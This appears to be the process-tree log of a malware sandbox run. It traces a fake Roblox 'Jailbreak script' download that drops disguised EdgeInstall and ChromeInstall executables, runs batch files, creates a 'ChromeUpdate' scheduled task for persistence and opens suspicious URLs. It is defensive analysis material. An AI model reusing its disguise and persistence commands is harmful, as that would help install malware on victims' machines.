C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://getfiles.wiki/welcome.php
9⤵
PID:1928

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0x40,0x128,0x7ffe72b246f8,0x7ffe72b24708,0x7ffe72b24718
10⤵
PID:5620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5200 /prefetch:1
5⤵
PID:4324

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4120

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
5⤵
PID:744

C:\Users\Admin\Downloads\Jailbreak script (1).exe
"C:\Users\Admin\Downloads\Jailbreak script (1).exe"
5⤵
- Executes dropped EXE
PID:2784

C:\Users\Admin\AppData\Local\Temp\is-79PKI.tmp\Jailbreak script (1).tmp
"C:\Users\Admin\AppData\Local\Temp\is-79PKI.tmp\Jailbreak script (1).tmp" /SL5="$13033E,857904,780800,C:\Users\Admin\Downloads\Jailbreak script (1).exe"
6⤵
- Checks computer location settings
- Executes dropped EXE
PID:3632

C:\Users\Admin\Downloads\Jailbreak script (1).exe
"C:\Users\Admin\Downloads\Jailbreak script (1).exe" /SILENT
7⤵
- Executes dropped EXE
PID:1552

C:\Users\Admin\AppData\Local\Temp\is-5QAJF.tmp\Jailbreak script (1).tmp
"C:\Users\Admin\AppData\Local\Temp\is-5QAJF.tmp\Jailbreak script (1).tmp" /SL5="$14033E,857904,780800,C:\Users\Admin\Downloads\Jailbreak script (1).exe" /SILENT
8⤵
- Executes dropped EXE
PID:5808

C:\Users\Admin\AppData\Local\MicroApp\EdgeInstall.exe
"C:\Users\Admin\AppData\Local\MicroApp\EdgeInstall.exe" install
9⤵
- Executes dropped EXE
PID:484

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\MicroApp\edge.bat" install"
9⤵
PID:5612

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\MicroApp\reg.bat" install"
9⤵
PID:2892

C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe
"C:\Users\Admin\AppData\Local\ServiceApp\ChromeInstall.exe" install
9⤵
- Checks computer location settings
- Executes dropped EXE
PID:5268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\ServiceApp\chrome.bat" "
10⤵
PID:4748

C:\Windows\system32\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate
11⤵
- Creates scheduled task(s)
PID:5728

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\ServiceApp\chrome.bat" install"
9⤵
PID:4184

C:\Windows\system32\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate
10⤵
- Creates scheduled task(s)
PID:5188

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /C ""C:\Users\Admin\AppData\Local\ServiceApp\reg.bat" install"
9⤵
PID:4188

C:\Windows\system32\schtasks.exe
schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\ServiceApp\reg.xml" /tn ChromeUpdate
10⤵
- Creates scheduled task(s)
PID:4600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://getfiles.wiki/welcome.php
9⤵
PID:5608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe72b246f8,0x7ffe72b24708,0x7ffe72b24718
10⤵
PID:5748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
5⤵
PID:1516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6852 /prefetch:1
5⤵
PID:2804

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7752 /prefetch:2
5⤵
PID:4404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,2237513313576990755,8714962028708558415,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6860 /prefetch:1
5⤵
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5316 -s 1004
4⤵
- Program crash
PID:6020

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
PID:5844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe62c19758,0x7ffe62c19768,0x7ffe62c19778
3⤵
PID:4800

C:\Users\Admin\3D Objects\New jailbreak script - Linkvertise Downloader_51-dwu1.exe
"C:\Users\Admin\3D Objects\New jailbreak script - Linkvertise Downloader_51-dwu1.exe"
2⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\is-P8EEJ.tmp\New jailbreak script - Linkvertise Downloader_51-dwu1.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P8EEJ.tmp\New jailbreak script - Linkvertise Downloader_51-dwu1.tmp" /SL5="$F0336,1785071,899584,C:\Users\Admin\3D Objects\New jailbreak script - Linkvertise Downloader_51-dwu1.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:3208

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bstlar.com/MV/jailbreakscript
4⤵
- Enumerates system info in registry
- Modifies registry class
PID:5564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe72b246f8,0x7ffe72b24708,0x7ffe72b24718
5⤵
PID:5776

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
5⤵
PID:4452

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
5⤵
PID:5460

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2716 /prefetch:8
5⤵
PID:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
5⤵
PID:2880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
5⤵
PID:1716

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
5⤵
PID:4888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4812 /prefetch:1
5⤵
PID:2064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5800 /prefetch:8
5⤵
PID:2940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5508 /prefetch:1
5⤵
PID:2564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5476 /prefetch:8
5⤵
PID:760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5828 /prefetch:1
5⤵
PID:4172

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
5⤵
PID:3800

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6512 /prefetch:1
5⤵
PID:5852

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6500 /prefetch:1
5⤵
PID:4352

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\JAILBREAK_AUTOFARM_SCRIPT (1).txt
5⤵
PID:1900

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8
5⤵
PID:5404

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2128,6964813231591634640,81788860809055866,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5820 /prefetch:8
5⤵
PID:5708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3208 -s 1220
4⤵
- Program crash
PID:760

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
\??\C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
2⤵
- Executes dropped EXE
PID:4808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4808 -s 548
3⤵
- Program crash
PID:6964

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:6096

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x10c,0x110,0x114,0xe4,0x118,0x7ffe62c19758,0x7ffe62c19768,0x7ffe62c19778
3⤵
PID:5092

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1764 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:2
3⤵
PID:6416

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2248 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:3244

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:7116

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3120 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:1
3⤵
PID:5936

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3100 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:1
3⤵
PID:5652

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4384 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:1
3⤵
PID:5688

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4756 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:6856

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4884 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:1
3⤵
PID:6756

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4748 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:6912

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5232 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:5924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5376 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:6472

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5144 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:6940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4764 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:5532

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4644 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:8

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4580 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:1
3⤵
PID:5408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=4080 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:1
3⤵
PID:2400

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 --field-trial-handle=1920,i,17614797361171886357,15965892493182237838,131072 /prefetch:8
3⤵
PID:4484

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe
"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe" roblox-player:1+launchmode:play+gameinfo:AmnJ0ybVdJpNkNXv-g4l_eW-cOr8metxPWlB5KCxENMWQFScaM8fJlZkc4VpkkahL_TfaAZ8X4QaaMxh9zNEp12ohMguZwt7HDLQFE__tDsUpYE90aONlEsSu3Uh2i3OuZZFRsa_kQb-TC32q8KGNVx4v-MVLP0DHO2Fl6SZqTIZ_1JHcHvBTS7XolqnQ_kzKL4yZfitJWpc3U528vhOFM4Sra_X6mdt5txUThLGa-A+launchtime:1680039140103+placelauncherurl:https%3A%2F%2Fassetgame.roblox.com%2Fgame%2FPlaceLauncher.ashx%3Frequest%3DRequestGame%26browserTrackerId%3D167300714984%26placeId%3D606849621%26isPlayTogetherGame%3Dfalse%26joinAttemptId%3D4fcd12f5-d851-49c4-b179-f5de4d49ba5e%26joinAttemptOrigin%3DPlayButton+browsertrackerid:167300714984+robloxLocale:en_us+gameLocale:en_us+channel:+LaunchExp:InApp
3⤵
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies Internet Explorer settings
- Modifies registry class
PID:5144

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe
"C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerLauncher.exe" --crashpad --no-rate-limit --database=C:\Users\Admin\AppData\Local\Temp\crashpad_roblox --metrics-dir=C:\Users\Admin\AppData\Local\Temp\crashpad_roblox --url=https://upload.crashes.rbxinfra.com/post --annotation=RobloxChannel=production --annotation=RobloxGitHash=d4a4a4ad1cbd35850c37a672e5c216b9b80fbbae --annotation=UploadAttachmentKiloByteLimit=100 --annotation=UploadPercentage=100 --annotation=format=minidump --annotation=token=a2440b0bfdada85f34d79b43839f2b49ea6bba474bd7d126e844bc119271a1c3 --initial-client-data=0x728,0x72c,0x730,0x6f0,0x704,0x81f748,0x81f758,0x81f768
4⤵
- Executes dropped EXE
PID:4648

C:\Program Files (x86)\Roblox\Versions\version-1720baa3c1c34d9c\RobloxPlayerBeta.exe
